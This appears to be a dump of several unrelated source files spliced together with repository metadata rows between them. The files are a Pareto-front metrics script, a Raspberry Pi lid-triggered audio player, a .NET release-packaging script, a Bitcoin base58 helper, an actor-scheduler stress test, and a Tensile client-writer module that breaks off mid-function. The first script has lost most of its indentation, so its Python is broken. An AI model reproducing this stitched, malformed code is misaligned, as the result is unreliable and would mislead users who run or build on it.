# For the spread calculation, the euclidean distance is used.
#
# Hypervolumes are calculated using the code of Simon Wessing from TU Dortmund University found at:
# https://ls11-www.cs.uni-dortmund.de/rudolph/hypervolume/start
#
# Please feel free to contact me at: renzom@fing.edu.uy
#
############################################################################################################################
import sys
from os import path
sys.path.append('../libs')
import generic_pf_metrics
def load_jmetal_results(path_to_results, objectives, number_of_runs):
    #Initialize the nested lists that will hold the pareto fronts
    #(one list per run, one sub-list per objective)
    results = []
    for run in range(0, number_of_runs):
results.append([])
for no in range(len(objectives)):
results[run].append([])
for run in range(0,number_of_runs):
path_to_file = path.join(path_to_results, "FUN.{0}".format(run))
with open(path_to_file) as f:
for line in f:
tokens = line.split()
for no in range(len(objectives)):
results[run][no].append(float(tokens[no]))
return results
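# Illustrative sketch, not part of the original script: generational distance
# for a two-objective front, following the formula from Deb's book that
# generic_pf_metrics.compute is expected to apply. The [[obj1...],[obj2...]]
# argument layout mirrors the per-run lists built by load_jmetal_results.
def _generational_distance_sketch(front, reference_front, p=2):
    n = len(front[0])
    total = 0.0
    for i in range(n):
        # euclidean distance from point i to its nearest reference point
        d = min(((front[0][i] - reference_front[0][j]) ** 2 +
                 (front[1][i] - reference_front[1][j]) ** 2) ** 0.5
                for j in range(len(reference_front[0])))
        total += d ** p
    return (total ** (1.0 / p)) / n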
####################################
########## MAIN ####################
def main():
ref_pf_file = None
normalize = None
if len(sys.argv) != 6 and len(sys.argv) != 7:
print("Not enough parameters. Usage:")
print(" - python {0} <path_to_results> <number_of_runs> <normalize> <obj1_name> <obj2_name>".format(sys.argv[0]))
print(" - python {0} <reference pf> <path_to_results> <number_of_runs> <normalize> <obj1_name> <obj2_name>".format(sys.argv[0]))
exit(-1)
else:
if len(sys.argv) == 6:
path_to_results = sys.argv[1]
number_of_runs = int(sys.argv[2])
normalize = sys.argv[3].strip().lower()
objectives = [sys.argv[4], sys.argv[5]]
else:
ref_pf_file = sys.argv[1]
path_to_results = sys.argv[2]
number_of_runs = int(sys.argv[3])
normalize = sys.argv[4].strip().lower()
objectives = [sys.argv[5], sys.argv[6]]
#Load the pareto fronts from the files
results = load_jmetal_results(path_to_results, objectives, number_of_runs)
generic_pf_metrics.compute(ref_pf_file, path_to_results, number_of_runs, objectives, results, normalize)
if __name__ == "__main__":
main()
|
gpl-3.0
| 1,158,768,144,247,686,000
| 38.327103
| 136
| 0.612643
| false
| 3.533165
| false
| false
| false
|
arnaudjuracek/py_suzanne
|
bak.run.py
|
1
|
1766
|
# ---------------------------
# py_suzanne 1.0
# Arnaud Juracek
# github.com/arnaudjuracek
import RPi.GPIO as GPIO
import glob, pygame, time, os, random
# --------------------------
# startup notification
print 'py_suzanne started'
os.system('omxplayer data/hello_world.aiff')
# --------------------------
# GPIO settings
GPIO.setmode(GPIO.BCM)
GPIO.setup(18, GPIO.IN, pull_up_down=GPIO.PUD_UP)
# --------------------------
# USB handling/mounting
usb = '/home/pi/Suzanne/usb/'
files = []
def getfile():
if not os.listdir(usb):
print 'getfile(): usb not mounted, mounting...'
for drive in glob.glob('/dev/sd*'):
os.system('sudo mount '+ drive + ' ' + usb +' -o uid=pi,gid=pi')
files = soundfiles(usb)
if len(files)>0:
file = random.choice(files)
print 'getfile(): '+ file +' selected'
return file
else:
print "getfile():error: couldn't get file : usb directory empty or not mounted correctly"
return 'data/error.mp3'
# -------------------------
# sound files filter
# see http://stackoverflow.com/a/4568638
def soundfiles(path):
ext = (path + '*.mp3', path + '*.wav')
sounds = []
for files in ext:
sounds.extend(glob.glob(files))
return sounds
# -------------------------
# instantiate pygame.mixer, player, etc
# see http://www.pygame.org/docs/ref/music.html#module-pygame.mixer.music
mixer = pygame.mixer
player = mixer.music
mixer.init()
# -------------------------
# lid open/close listenning
# see http://razzpisampler.oreilly.com/ch07.html
while True:
time.sleep(.5)
# GPIO.input(18) == False when 18 linked to GND
# GPIO.input(18) == True when 18 not linked to GND
if GPIO.input(18) == True:
if player.get_busy() == False:
player.load(getfile())
player.play()
else:
#player.fadeout(1000)
player.stop()
|
gpl-3.0
| 2,631,060,658,673,370,000
| 24.970588
| 91
| 0.610985
| false
| 2.92869
| false
| false
| false
|
markfinal/BuildAMation
|
codingtools/dotnetcore_make_release.py
|
1
|
10008
|
#!/usr/bin/python
from generate_docs import build_documentation
from generate_docs import NoDoxygenError
from optparse import OptionParser
import os
import platform
import shutil
import stat
import subprocess
import sys
import tarfile
import tempfile
import traceback
import zipfile
g_script_dir = os.path.dirname(os.path.realpath(__file__))
g_bam_dir = os.path.dirname(g_script_dir)
def log(msg):
print >>sys.stdout, msg
sys.stdout.flush()
def run_process(args):
try:
log('Running: %s' % ' '.join(args))
subprocess.check_call(args)
except OSError, e:
raise RuntimeError('Unable to run process "%s" because "%s"' % (' '.join(args), str(e)))
def _run_git(arguments):
args = []
args.append('git')
args.extend(arguments)
log('Running: %s' % ' '.join(args))
result = subprocess.check_output(args)
return result.rstrip()
def get_branch_name():
return _run_git(['rev-parse', '--abbrev-ref', 'HEAD'])
def get_hash():
return _run_git(['rev-parse', '--short', 'HEAD'])
def run_dotnet(target, project_path, source_dir, output_dir, configuration='Release', framework='netcoreapp2.1', force=True, standalone_platform=None, verbosity='normal', extra_properties=None):
output_dir = os.path.join(output_dir, 'bin', configuration, framework)
cur_dir = os.getcwd()
os.chdir(source_dir)
try:
args = []
args.append('dotnet')
args.append(target)
args.append(project_path)
args.append('-c')
args.append(configuration)
args.append('-f')
args.append(framework)
if force:
args.append('--force')
args.append('-o')
args.append(output_dir)
args.append('-v')
args.append(verbosity)
if standalone_platform:
args.append('--self-contained')
args.append('-r')
args.append(standalone_platform)
if extra_properties:
args.append(extra_properties)
run_process(args)
finally:
os.chdir(cur_dir)
def delete_directory(dir):
if os.path.isdir(dir):
log('Deleting folder, %s' % dir)
shutil.rmtree(dir)
def run_dotnet_publish(source_dir, build_dir, configuration='Release', framework='netcoreapp2.1', force=True, standalone_platform=None, verbosity='normal'):
delete_directory(build_dir)
os.makedirs(build_dir)
project = os.path.join(source_dir, 'Bam', 'Bam.csproj') # specifically build the Bam executable, so that the unit test dependencies don't get dragged in
run_dotnet('clean', project, source_dir, build_dir, configuration=configuration, framework=framework, force=False, standalone_platform=None, verbosity=verbosity)
run_dotnet('publish', project, source_dir, build_dir, configuration=configuration, framework=framework, force=force, standalone_platform=standalone_platform, verbosity=verbosity, extra_properties='/p:DebugType=None')
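# For illustration (paths are hypothetical), run_dotnet_publish above assembles
# commands of the form:
#   dotnet clean <src>/Bam/Bam.csproj -c Release -f netcoreapp2.1 -o <build>/bin/Release/netcoreapp2.1 -v normal
#   dotnet publish <src>/Bam/Bam.csproj -c Release -f netcoreapp2.1 --force -o <build>/bin/Release/netcoreapp2.1 -v normal /p:DebugType=None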
def copy_directory_to_directory(srcdir,destdir):
log('\tCopying directory ' + srcdir)
shutil.copytree(srcdir, destdir)
def copy_file_to_directory(srcfile,destdir):
log('\tCopying file ' + srcfile)
shutil.copy(srcfile, destdir)
def copy_support_files(source_dir, build_dir):
cur_dir = os.getcwd()
os.chdir(source_dir)
log('Copying support files from %s to %s ...' % (source_dir, build_dir))
try:
copy_directory_to_directory('packages', os.path.join(build_dir, 'packages'))
copy_directory_to_directory('tests', os.path.join(build_dir, 'tests'))
copy_file_to_directory('env.sh', build_dir)
copy_file_to_directory('env.bat', build_dir)
copy_file_to_directory('Changelog.txt', build_dir)
copy_file_to_directory('License.md', build_dir)
copy_file_to_directory('MS-PL.md', build_dir)
copy_file_to_directory('3rdPartyLicenses.md', build_dir)
finally:
os.chdir(cur_dir)
def list_files(base_dir):
log('Listing files in ' + base_dir)
starting_depth = base_dir.count(os.sep)
for root, dirs, files in os.walk(base_dir):
depth = root.count(os.sep) - starting_depth
log(' ' * depth + os.path.basename(root))
for f in files:
log(' ' * (depth + 1) + f)
def zip_dir(zip_path, dir):
log('Zipping directory %s to %s' % (dir, zip_path))
base_dir, leaf = os.path.split(dir)
cwd = os.getcwd()
try:
os.chdir(base_dir)
with zipfile.ZipFile(zip_path, "w", zipfile.ZIP_DEFLATED) as zip_object:
for root, dirs, files in os.walk(leaf):
for file_path in files:
zip_object.write(os.path.join(root, file_path))
finally:
os.chdir(cwd)
def tar_dir(tar_path, dir):
def windows_executable_filter(tarinfo):
if platform.system() != "Windows":
return tarinfo
# attempt to fix up the permissions that are lost during tarring on Windows
if tarinfo.name.endswith(".exe") or\
tarinfo.name.endswith(".dll") or\
tarinfo.name.endswith(".py") or\
tarinfo.name.endswith(".sh") or\
tarinfo.name.endswith("bam"):
tarinfo.mode = stat.S_IRUSR | stat.S_IXUSR | stat.S_IRGRP | stat.S_IXGRP | stat.S_IROTH | stat.S_IXOTH
return tarinfo
log('Tarring directory %s to %s' % (dir, tar_path))
base_dir, leaf = os.path.split(dir)
cwd = os.getcwd()
try:
os.chdir(base_dir)
with tarfile.open(tar_path, "w:gz") as tar:
tar.add(leaf, filter=windows_executable_filter)
finally:
os.chdir(cwd)
def main(options, build_dir, source_dir):
_,bam_version_dir = os.path.split(build_dir)
if options.doxygen:
generated_docs_dir = os.path.join(source_dir, 'docs')
delete_directory(generated_docs_dir)
try:
build_documentation(source_dir, options.doxygen, False)
if options.make_distribution:
zip_dir(os.path.realpath(os.path.join(build_dir, '..', '%s-docs' % bam_version_dir) + '.zip'), generated_docs_dir)
tar_dir(os.path.realpath(os.path.join(build_dir, '..', '%s-docs' % bam_version_dir) + '.tgz'), generated_docs_dir)
except NoDoxygenError, e:
log(str(e)) # not fatal, but do complain
run_dotnet_publish(
source_dir,
build_dir,
configuration='Release',
framework='netcoreapp2.1',
force=True,
verbosity='normal'
)
copy_support_files(source_dir, build_dir)
#list_files(build_dir)
if options.make_distribution:
zip_dir(os.path.realpath(os.path.join(build_dir, '..', '%s-AnyCPU' % bam_version_dir) + '.zip'), build_dir)
tar_dir(os.path.realpath(os.path.join(build_dir, '..', '%s-AnyCPU' % bam_version_dir) + '.tgz'), build_dir)
if options.standalone:
platforms = []
platforms.append('win-x64')
platforms.append('osx-x64')
platforms.append('linux-x64')
for platform in platforms:
platform_build_dir = build_dir + '-' + platform
run_dotnet_publish(
source_dir,
platform_build_dir,
configuration='Release',
framework='netcoreapp2.1',
force=True,
standalone_platform=platform
)
            copy_support_files(source_dir, platform_build_dir)
            #list_files(platform_build_dir)
def clone_repo(checkout_dir, gittag):
args = [
"git",
"clone",
"--depth",
"1",
"--branch",
gittag,
"https://github.com/markfinal/BuildAMation.git",
checkout_dir
]
log('Running: %s' % ' '.join(args))
subprocess.check_call(args)
log('Cloning complete')
if __name__ == '__main__':
parser = OptionParser()
parser.add_option('-s', '--standalone', action='store_true', dest='standalone', help='Make builds specific to the current platform and standalone.')
parser.add_option('-d', '--doxygen', dest='doxygen', default=None, help='Location of the doxygen executable in order to generate documentation.')
parser.add_option('-t', '--tag', dest='gittag', default=None, help='Create a release from a named git tag. Clones at depth 1 from the named tag into a temporary directory.')
parser.add_option('-x', '--distribution', action='store_true', dest='make_distribution', help='Generate zip and tar archives for the build to distribute.')
parser.add_option('-l', '--local', action='store_true', dest='local', help='Builds the local checkout into a bam_publish subdirectory')
parser.add_option('-c', '--clean', action='store_true', dest='cleanup', help='Clean up any intermediate temporary folders created at the end of a successful build.')
(options, args) = parser.parse_args()
temp_dir = tempfile.mkdtemp()
if options.gittag:
# for some reason, cloning into a temporary folder (at least on macOS), causes the build
# not to fail, but to generate an invalid set of assemblies
# the Bam.dll won't run with dotnet, and the schema is in the wrong place, for starters
source_dir = os.path.realpath(os.path.join(g_bam_dir, '..', "BuildAMation-%s-src" % options.gittag))
build_dir = os.path.join(temp_dir, "BuildAMation-%s" % options.gittag)
clone_repo(source_dir, options.gittag)
elif options.local:
source_dir = g_bam_dir
build_dir = os.path.join(source_dir, 'bam_publish')
else:
source_dir = g_bam_dir
branch = get_branch_name()
hash = get_hash()
build_dir = os.path.join(temp_dir, "BuildAMation-%s-%s" % (hash,branch))
try:
main(options, build_dir, source_dir)
# remove cloned checkout directory
if options.gittag and options.cleanup:
delete_directory(source_dir)
except Exception, e:
log('*** Failure reason: %s' % str(e))
log(traceback.format_exc())
finally:
pass
log('Done')
|
bsd-3-clause
| 2,779,776,771,498,325,000
| 36.066667
| 220
| 0.624201
| false
| 3.565372
| true
| false
| false
|
Unthinkingbit/bitcointools
|
base58.py
|
1
|
3506
|
#!/usr/bin/env python
"""encode/decode base58 in the same way that Bitcoin does"""
import hashlib
import math
__b58chars = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
__b58base = len(__b58chars)
getNewRIPEMD160 = None
getNewSHA256 = None
def b58encode(v):
""" encode v, which is a string of bytes, to base58.
"""
long_value = 0L
for (i, c) in enumerate(v[::-1]):
long_value += (256**i) * ord(c)
result = ''
while long_value >= __b58base:
div, mod = divmod(long_value, __b58base)
result = __b58chars[mod] + result
long_value = div
result = __b58chars[long_value] + result
# Bitcoin does a little leading-zero-compression:
# leading 0-bytes in the input become leading-1s
nPad = 0
for c in v:
if c == '\0': nPad += 1
else: break
return (__b58chars[0]*nPad) + result
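# For example, b58encode('\x00\x00\x01') == '112': the value 1 encodes to '2'
# and the two leading zero bytes become two leading '1' characters.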
def b58decode(v, length):
""" decode v into a string of len bytes
"""
long_value = 0L
for (i, c) in enumerate(v[::-1]):
long_value += __b58chars.find(c) * (__b58base**i)
result = ''
while long_value >= 256:
div, mod = divmod(long_value, 256)
result = chr(mod) + result
long_value = div
result = chr(long_value) + result
nPad = 0
for c in v:
if c == __b58chars[0]: nPad += 1
else: break
result = chr(0)*nPad + result
if length is not None and len(result) != length:
return None
return result
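# For example, b58decode('112', 3) == '\x00\x00\x01', the inverse of the
# b58encode example above; passing a wrong expected length returns None.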
def getNewRIPEMD160ByCrypto(public_key=""):
return RIPEMD160.new(public_key)
def getNewRIPEMD160ByHashlib(public_key=""):
newRIPEMD160 = hashlib.new('ripemd160')
newRIPEMD160.update(public_key)
return newRIPEMD160
def getNewSHA256ByCrypto(public_key=""):
return SHA256.new(public_key)
def getNewSHA256ByHashlib(public_key=""):
return hashlib.sha256(public_key)
try:
# Python Crypto library is at: http://www.dlitz.net/software/pycrypto/
# Needed for RIPEMD160 hash function, used to compute
# Bitcoin addresses from internal public keys.
import Crypto.Hash.RIPEMD160 as RIPEMD160
getNewRIPEMD160 = getNewRIPEMD160ByCrypto
except ImportError:
try:
test = getNewRIPEMD160ByHashlib()
getNewRIPEMD160 = getNewRIPEMD160ByHashlib
  except (ImportError, ValueError):
    print("Cannot import RIPEMD160")
try:
# Python Crypto library is at: http://www.dlitz.net/software/pycrypto/
# Needed for RIPEMD160 hash function, used to compute
# Bitcoin addresses from internal public keys.
import Crypto.Hash.SHA256 as SHA256
getNewSHA256 = getNewSHA256ByCrypto
except ImportError:
try:
test = getNewSHA256ByHashlib()
getNewSHA256 = getNewSHA256ByHashlib
except ImportError:
print("Can not import SHA256")
def hash_160(public_key):
if getNewSHA256 == None or getNewRIPEMD160 == None:
return ''
h1 = getNewSHA256(public_key).digest()
h2 = getNewRIPEMD160(h1).digest()
return h2
def public_key_to_bc_address(public_key):
h160 = hash_160(public_key)
return hash_160_to_bc_address(h160)
def hash_160_to_bc_address(h160):
if getNewSHA256 == None:
return ''
vh160 = "\x00"+h160 # \x00 is version 0
h3=getNewSHA256(getNewSHA256(vh160).digest()).digest()
addr=vh160+h3[0:4]
return b58encode(addr)
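# The encoded payload is 25 bytes: 1 version byte + 20-byte RIPEMD160 hash +
# 4-byte double-SHA256 checksum, which is why bc_address_to_hash_160 below
# decodes with an expected length of 25 and keeps bytes 1..20 (the hash).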
def bc_address_to_hash_160(addr):
bytes = b58decode(addr, 25)
return bytes[1:21]
if __name__ == '__main__':
x = '005cc87f4a3fdfe3a2346b6953267ca867282630d3f9b78e64'.decode('hex_codec')
encoded = b58encode(x)
print encoded, '19TbMSWwHvnxAKy12iNm3KdbGfzfaMFViT'
print b58decode(encoded, len(x)).encode('hex_codec'), x.encode('hex_codec')
|
mit
| -4,130,492,044,310,019,000
| 25.969231
| 80
| 0.692527
| false
| 2.951178
| false
| false
| false
|
thomasquintana/jobber
|
profile.py
|
1
|
2236
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# Thomas Quintana <quintana.thomas@gmail.com>
"""
Simulates the overhead of a system with 10000 actors that do nothing,
each processing 1000 messages and then shutting down.
Run with command:
python -m cProfile -s time profile.py
"""
AMOUNT_PROCESSORS = 10000
AMOUNT_MESSAGES = 1000
import unittest
from mock import create_autospec, Mock
from jobber.constants import (ACTOR_PROCESSOR_COMPLETED, ACTOR_SCHEDULER_RUNNING,
ACTOR_SCHEDULER_STOPPED, ACTOR_SCHEDULER_STOPPING)
from jobber.core.scheduler.shortest_job_next_scheduler import SJNScheduler
from jobber.core.actor.processor import ActorProcessor
from jobber.core.scheduler.actor_heap import ShortestJobNextHeap
from jobber.core.actor.actor import Actor
from jobber.core.messages.poison_pill import PoisonPill
from jobber.core.exceptions.no_messages_exception import NoMessagesException
class MockMessage(object):
pass
def stresstest():
scheduler = SJNScheduler()
mock_actor = create_autospec(Actor())
processors = [ActorProcessor(mock_actor) for _ in range(AMOUNT_PROCESSORS)]
for processor in processors:
for _ in range(AMOUNT_MESSAGES):
processor._receive_message(MockMessage())
for processor in processors:
scheduler.schedule(processor)
scheduler._state = ACTOR_SCHEDULER_RUNNING
scheduler.shutdown()
    scheduler._state = ACTOR_SCHEDULER_STOPPED
scheduler.start()
if __name__=='__main__':
stresstest()
|
apache-2.0
| 1,259,529,836,510,303,700
| 32.878788
| 81
| 0.76297
| false
| 3.822222
| false
| false
| false
|
guacamoleo/Tensile
|
Tensile/ClientWriter.py
|
1
|
38398
|
################################################################################
# Copyright (C) 2016 Advanced Micro Devices, Inc. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell cop-
# ies of the Software, and to permit persons to whom the Software is furnished
# to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IM-
# PLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNE-
# CTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
################################################################################
from Common import globalParameters, HR, pushWorkingPath, popWorkingPath, print1, CHeader, printWarning
from SolutionStructs import Solution
from SolutionWriter import SolutionWriter
import YAMLIO
import os
from subprocess import Popen
from shutil import copy as shutil_copy
from shutil import rmtree
################################################################################
# Main
################################################################################
def main( config ):
libraryLogicPath = os.path.join(globalParameters["WorkingPath"], \
globalParameters["LibraryLogicPath"])
pushWorkingPath(globalParameters["LibraryClientPath"])
##############################################################################
# Copy Source Files
##############################################################################
pushWorkingPath("source")
filesToCopy = [
"Client.cpp",
"Client.h",
"DeviceStats.h",
"ReferenceCPU.h",
"MathTemplates.cpp",
"MathTemplates.h",
"KernelHeader.h",
"Tools.h",
"CMakeLists.txt",
"TensileConfig.cmake",
"TensileConfigVersion.cmake"
]
for f in filesToCopy:
shutil_copy(
os.path.join(globalParameters["SourcePath"], f),
globalParameters["WorkingPath"] )
if globalParameters["RuntimeLanguage"] == "OCL":
shutil_copy(
os.path.join(globalParameters["SourcePath"], "FindOpenCL.cmake"),
globalParameters["WorkingPath"] )
else:
shutil_copy(
os.path.join(globalParameters["SourcePath"], "FindHIP.cmake"),
globalParameters["WorkingPath"] )
shutil_copy(
os.path.join(globalParameters["SourcePath"], "FindHCC.cmake"),
globalParameters["WorkingPath"] )
##############################################################################
# Read Logic Files
##############################################################################
logicFiles = [os.path.join(libraryLogicPath, f) for f \
in os.listdir(libraryLogicPath) \
if (os.path.isfile(os.path.join(libraryLogicPath, f)) \
and os.path.splitext(f)[1]==".yaml")]
print1("LogicFiles: %s" % logicFiles)
functions = []
functionNames = []
enableHalf = False
for logicFileName in logicFiles:
(scheduleName, deviceNames, problemType, solutionsForType, \
indexOrder, exactLogic, rangeLogic) \
= YAMLIO.readLibraryLogicForSchedule(logicFileName)
if problemType["DataType"].isHalf():
enableHalf = True
functions.append((scheduleName, problemType))
functionNames.append("tensile_%s" % (problemType))
globalParameters["EnableHalf"] = enableHalf
##############################################################################
# Write Generated Header
##############################################################################
forBenchmark = False
solutions = None
problemSizes = None
stepName = None
writeClientParameters(forBenchmark, solutions, problemSizes, stepName, \
functions)
popWorkingPath() # source
##############################################################################
# Run Build Script
##############################################################################
# if redo=true, clobber the build directory
if globalParameters["ForceRedoLibraryClient"]:
rmtree(os.path.join(globalParameters["WorkingPath"], "build"), \
ignore_errors=True)
pushWorkingPath("build")
# write runScript
path = globalParameters["WorkingPath"]
forBenchmark = False
runScriptName = writeRunScript(path, libraryLogicPath, forBenchmark)
# run runScript
process = Popen(runScriptName, cwd=globalParameters["WorkingPath"])
process.communicate()
if process.returncode:
printWarning("Benchmark Process exited with code %u" % process.returncode)
popWorkingPath() # build
popWorkingPath() # LibraryClient
################################################################################
# Write Run Script
################################################################################
def writeRunScript(path, libraryLogicPath, forBenchmark):
# create run.bat or run.sh which builds and runs
runScriptName = os.path.join(path, \
"run.%s" % ("bat" if os.name == "nt" else "sh") )
runScriptFile = open(runScriptName, "w")
echoLine = "@echo." if os.name == "nt" else "echo"
if os.name != "nt":
runScriptFile.write("#!/bin/sh\n")
q = "" if os.name == "nt" else "\""
runScriptFile.write("%s && echo %s%s%s && echo %s# Configuring CMake for Client%s && echo %s%s%s\n" \
% (echoLine, q, HR, q, q, q, q, HR, q))
runScriptFile.write("cmake")
# runtime and kernel language
runScriptFile.write(" -DTensile_RUNTIME_LANGUAGE=%s" \
% globalParameters["RuntimeLanguage"])
if globalParameters["EnableHalf"]:
runScriptFile.write(" -DTensile_ENABLE_HALF=ON")
if forBenchmark:
# for benchmark client
runScriptFile.write(" -DTensile_CLIENT_BENCHMARK=ON")
else:
# for library client
runScriptFile.write(" -DTensile_ROOT=%s" \
% os.path.join(globalParameters["ScriptPath"], "..") )
runScriptFile.write(" -DTensile_CLIENT_BENCHMARK=OFF")
runScriptFile.write(" -DTensile_LOGIC_PATH=%s" % libraryLogicPath)
runScriptFile.write(" -DTensile_LIBRARY_PRINT_DEBUG=%s" \
% ("ON" if globalParameters["LibraryPrintDebug"] else "OFF"))
runScriptFile.write(" -DTensile_SHORT_FILE_NAMES=%s" \
% ("ON" if globalParameters["ShortNames"] else "OFF"))
if globalParameters["CMakeCXXFlags"]:
runScriptFile.write(" -DCMAKE_CXX_FLAGS=%s" \
% globalParameters["CMakeCXXFlags"] )
if globalParameters["CMakeCFlags"]:
runScriptFile.write(" -DCMAKE_C_FLAGS=%s" \
% globalParameters["CMakeCFlags"] )
# for both
if os.name == "nt":
runScriptFile.write(" -DCMAKE_GENERATOR_PLATFORM=x64")
runScriptFile.write(" -DTensile_MERGE_FILES=%s" \
% ("ON" if globalParameters["MergeFiles"] else "OFF"))
runScriptFile.write(" ../source\n")
runScriptFile.write("%s && echo %s%s%s && echo %s# Building Client%s && echo %s%s%s\n" \
% (echoLine, q, HR, q, q, q, q, HR, q))
runScriptFile.write("cmake --build . --config %s%s\n" \
% (globalParameters["CMakeBuildType"], " -- -j 8" \
if os.name != "nt" else "") )
if forBenchmark:
if os.name == "nt":
runScriptFile.write(os.path.join(globalParameters["CMakeBuildType"], \
"client.exe") )
else:
if globalParameters["PinClocks"] and globalParameters["ROCmSMIPath"]:
runScriptFile.write("%s -d 0 --setfan 255 --setsclk 7\n" % globalParameters["ROCmSMIPath"])
runScriptFile.write("sleep 1\n")
runScriptFile.write("%s -d 0 -a\n" % globalParameters["ROCmSMIPath"])
runScriptFile.write("./client")
clp = ""
clp += " --platform-idx %u" % globalParameters["Platform"]
clp += " --device-idx %u" % globalParameters["Device"]
clp += " --init-alpha %u" % globalParameters["DataInitTypeAlpha"]
clp += " --init-beta %u" % globalParameters["DataInitTypeBeta"]
clp += " --init-c %u" % globalParameters["DataInitTypeC"]
clp += " --init-ab %u" % globalParameters["DataInitTypeAB"]
clp += " --print-valids %u" % globalParameters["ValidationPrintValids"]
clp += " --print-max %u" % globalParameters["ValidationMaxToPrint"]
clp += " --num-benchmarks %u" % globalParameters["NumBenchmarks"]
clp += " --num-elements-to-validate %u" % globalParameters["NumElementsToValidate"]
clp += " --num-enqueues-per-sync %u" % globalParameters["EnqueuesPerSync"]
clp += " --num-syncs-per-benchmark %u" % globalParameters["SyncsPerBenchmark"]
clp += " --use-gpu-timer %u" % globalParameters["KernelTime"]
clp += " --sleep-percent %u" % globalParameters["SleepPercent"]
runScriptFile.write(clp)
runScriptFile.write("\n")
if os.name != "nt":
if globalParameters["PinClocks"] and globalParameters["ROCmSMIPath"]:
runScriptFile.write("%s -d 0 --resetclocks\n" % globalParameters["ROCmSMIPath"])
runScriptFile.write("%s -d 0 --setfan 50\n" % globalParameters["ROCmSMIPath"])
else:
executablePath = os.path.join(globalParameters["WorkingPath"])
if os.name == "nt":
executablePath = os.path.join(executablePath, \
globalParameters["CMakeBuildType"], \
"client.exe")
else:
executablePath = os.path.join(executablePath, "client")
runScriptFile.write("%s && echo %s%s%s && echo %s# Library Client:%s && echo %s# %s%s && %s\n" \
% (echoLine, q, HR, q, q, q, q, executablePath, q, executablePath) )
runScriptFile.close()
if os.name != "nt":
os.chmod(runScriptName, 0777)
return runScriptName
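# For illustration (flag values depend on globalParameters and are hypothetical
# here), the generated run.sh for a benchmark configuration resembles:
#   cmake -DTensile_RUNTIME_LANGUAGE=HIP -DTensile_CLIENT_BENCHMARK=ON ../source
#   cmake --build . --config Release -- -j 8
#   ./client --platform-idx 0 --device-idx 0 ... --sleep-percent 0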
################################################################################
# Write Generated Benchmark Parameters
################################################################################
def writeClientParameters(forBenchmark, solutions, problemSizes, stepName, \
functionList):
h = ""
##############################################################################
# Min Naming
##############################################################################
if forBenchmark:
kernels = []
for solution in solutions:
solutionKernels = solution.getKernels()
for kernel in solutionKernels:
if kernel not in kernels:
kernels.append(kernel)
solutionSerialNaming = Solution.getSerialNaming(solutions)
kernelSerialNaming = Solution.getSerialNaming(kernels)
solutionMinNaming = Solution.getMinNaming(solutions)
kernelMinNaming = Solution.getMinNaming(kernels)
solutionWriter = SolutionWriter( \
solutionMinNaming, solutionSerialNaming, \
kernelMinNaming, kernelSerialNaming)
if forBenchmark:
if globalParameters["MergeFiles"]:
h += "#include \"Solutions.h\"\n"
else:
for solution in solutions:
solutionName = solutionWriter.getSolutionName(solution)
h += "#include \"" + solutionName + ".h\"\n"
h += "\n"
else:
h += "#include \"Tensile.h\"\n"
h += "typedef enum {\n"
h += " enum_float,\n"
h += " enum_double,\n"
h += " enum_TensileComplexFloat,\n"
h += " enum_TensileComplexDouble\n"
h += "#ifdef Tensile_ENABLE_HALF\n"
h += " ,enum_TensileHalf\n"
h += "#endif\n"
h += "} DataTypeEnum;\n"
h += "\n"
h += "const char indexChars[%u] = \"%s" \
% (len(globalParameters["IndexChars"])+1, \
globalParameters["IndexChars"][0])
for i in range(1, len(globalParameters["IndexChars"])):
h += globalParameters["IndexChars"][i]
h += "\";\n"
h += "unsigned int functionIdx;\n"
h += "unsigned int dataTypeIdx;\n"
h += "unsigned int problemTypeIdx;\n"
h += "\n"
##############################################################################
# Problem Types
##############################################################################
#dataTypes = []
#problemTypes = []
#functionSerialToDataTypeAndIdx = []
dataTypes = []
problemTypes = []
problemTypesForDataType = {} # for data type
schedulesForProblemType = {} # for problem type
  functionInfo = [] # [dataTypeIdxSerial, problemTypeIdxForDataType, problemTypeIdxSerial, functionIdxSerial, functionIdxForDataType, functionIdxForProblemType]
if forBenchmark:
problemType = solutions[0]["ProblemType"]
dataType = problemType["DataType"]
dataTypes.append(dataType)
problemTypes.append(problemType)
problemTypesForDataType[dataType] = [problemType]
schedulesForProblemType[problemType] = solutions
numProblemTypes = 1
for solution in solutions:
functionInfo.append([ 0, 0, 0, 0, 0, 0 ])
else:
for functionIdx in range(0, len(functionList)):
function = functionList[functionIdx]
scheduleName = function[0]
problemType = function[1]
dataType = problemType["DataType"]
if dataType not in dataTypes:
dataTypes.append(dataType)
problemTypesForDataType[dataType] = []
if problemType not in problemTypesForDataType[dataType]:
problemTypesForDataType[dataType].append(problemType)
schedulesForProblemType[problemType] = []
schedulesForProblemType[problemType].append(scheduleName)
# sort
dataTypes = sorted(dataTypes)
for dataType in dataTypes:
problemTypesForDataType[dataType] = \
sorted(problemTypesForDataType[dataType])
for problemType in problemTypesForDataType[dataType]:
schedulesForProblemType[problemType] = \
sorted(schedulesForProblemType[problemType])
# assign info
functionIdxSerial = 0
problemTypeIdxSerial = 0
for dataTypeIdxSerial in range(0, len(dataTypes)):
dataType = dataTypes[dataTypeIdxSerial]
